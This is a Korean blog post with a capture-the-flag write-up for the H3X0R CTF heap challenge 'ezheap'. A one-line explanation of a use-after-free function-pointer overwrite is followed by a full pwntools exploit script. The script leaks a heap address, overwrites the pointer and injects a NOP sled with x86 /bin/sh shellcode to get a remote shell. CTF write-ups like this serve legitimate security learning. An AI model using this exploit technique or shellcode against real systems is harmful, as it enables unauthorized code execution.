ABOUT ME

    -

    Today
    -
    Yesterday
    -
    Total
    -
    • H3X0R CTF ezheap
      CTF 2017. 1. 8. 02:28


      한번 free하게되면 함수포인터가있는곳에 할당이되는데 기존힙에 쉘코드 + 놉을 넣어주고 조작한 함수포인터를 호출하면댐


      from pwn import *

p = remote("52.199.49.117",10003)
# p = remote("10.211.55.3",11111)




leak = int(p.recv(9),16)
log.info(hex(leak))

print p.recvuntil(">>>")
p.sendline("1")
print p.recvuntil(">>>")
p.sendline("3")


payload = "AAAA"
p.sendline(payload)
print p.recvuntil(">>>")
p.sendline("4")
print p.recvuntil("Exit?")
p.sendline("0")
print p.recvuntil(">>>")
p.sendline("3")


payload = p32(leak+12)
payload += "\x90"*16
payload += "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"



p.sendline(payload)
p.interactive()


      저작자표시

      'CTF' 카테고리의 다른 글

      H3X0R CTF train_busan  (4) 2017.01.10
      H3X0R CTF comment  (0) 2017.01.09
      H3X0R CTF Be rich  (0) 2017.01.08
      Plaid CTF prodmanager  (0) 2017.01.07
      [BoB CTF] casino  (0) 2017.01.04

      관련글 관련글 더보기

      댓글

    Designed by Tistory.

    티스토리툴바